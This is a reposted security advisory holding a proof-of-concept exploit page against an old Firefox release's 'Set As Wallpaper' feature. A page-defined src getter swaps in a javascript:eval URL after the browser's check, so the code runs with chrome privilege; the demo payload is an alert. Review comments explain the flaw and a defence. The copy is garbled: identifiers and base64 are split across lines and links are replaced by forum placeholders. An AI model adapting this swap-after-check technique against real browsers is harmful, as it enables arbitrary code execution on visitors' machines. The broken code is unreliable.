Advisory : FrSIRT/ADV-2005-1075 (issue #2)
Rated as : Critical
// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="
Para ver este enlace Registrate o Inicia Sesion">
<head>
<style>
/*
 * Styles the page's single IMG element as a block-level 96x96 box with a
 * 1px red border and an inline PNG background supplied as a data: URI.
 * The IMG in the body has no src attribute in markup, so this background is
 * presumably what makes the element visible for the right-click step
 * described in the body text.
 *
 * NOTE(review): this copy was altered in extraction. The base64 payload is
 * hard-wrapped across many lines, and the URL in the commented-out
 * background-image rule was replaced by the hosting forum's login
 * placeholder text. Verify against an original copy before relying on it.
 */
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image: url("
Para ver este enlace Registrate o Inicia Sesion");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYA
AAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmU
gSW1hZ2VSZWFke
XHJZTwAAAHWSUR
BVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9F
wSJoRkAEEAM0DD
4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrL
mjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBi
a+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABN
A3obAZXIAa6iKE
cGlMVQHwWyjYuL
2d4v2cPg8vZswx
7gHyAA
AK7AOif7SAbOqC
mn4Ha3AHFsIDtg
Pq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkg
mQ7yKCZxpCQxqU
ZhAECCJ4XgMl49
3ug21ZD+aDAXH0WL
M4A9MZPXJkJIIA
wTAR5pQMalaCAB
QUULttBGCCAGCn
NzgABBgAMJ5THw
GvJL
AAAAABJRU5ErkJ
ggg==");
}
</style>
</head>
<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.
A dialog that shows Components.stack will appear.
<IMG id="i"/>
<script>
<![CDATA[
// Demonstration script for the advisory named in the page header. It makes the
// image's `src` property answer differently on successive reads, so that a
// caller that checks the value first and reads it again later does not see the
// value it checked.
//
// NOTE(review): this copy was mangled in extraction. Several identifiers and
// two string literals are split across lines, and the first entry of `u` was
// replaced by the hosting forum's login placeholder, so the script does not
// parse as shown. The code is kept as found.

// Read count at which the getter below changes its answer: 2 when
// navigator.productSub is below 20050622, otherwise 4.
// NOTE(review): presumably this tracks how many times the browser's own
// wallpaper code reads `src` in each build; that code is not shown here.
var sx = navigator.prod
uctSub < 20050622 ? 2 : 4;
// it needs chrome privilege to get |Components.stack|
// The demonstration payload is only an alert that displays Components.stack.
// Per the author's comment above, seeing that value is the evidence that the
// string was evaluated with chrome privilege rather than as page content.
var code = "alert('Exploit!\\n\\n' + Components.sta
ck);";
// Swap single quotes for double quotes and double every backslash so the text
// can sit inside the single-quoted eval('...') argument built below.
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
// Two candidate values for `src`: u[0] is returned on the early reads and u[1],
// a javascript: URL wrapping the payload, afterwards.
// NOTE(review): u[0] was a link in the original post; TODO confirm what it was.
var u = [ "
Para ver este enlace Registrate o Inicia Sesion",
"javascript:eval('" + evalCode + "')" ];
// Number of times `src` has been read since the last right click.
var sc = 0;
var i = document.getEl
ementById("i");
// Reset the read counter whenever the context menu is opened on the image, so
// the sequence starts again for each attempt.
i.addEventList
ener("contextmenu", function(e) { sc = 0; }, false);
// Page-defined getter for the image's `src` property.
// Defensive takeaway: a property on a content object can be backed by a
// page-supplied function and so is not stable between reads. Privileged code
// should read such a value once, validate the scheme of that same copy, and
// use only that copy, ideally through an access path that does not invoke
// page-defined getters.
i.__defineGett
er__("src", function() {
// Interactive variant left by the author: asks on every read which value to return.
//return (confirm(++sc)) ? u[0] : u[1];
// Return u[0] while the incremented counter is below sx, then u[1].
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>
</body>
</html>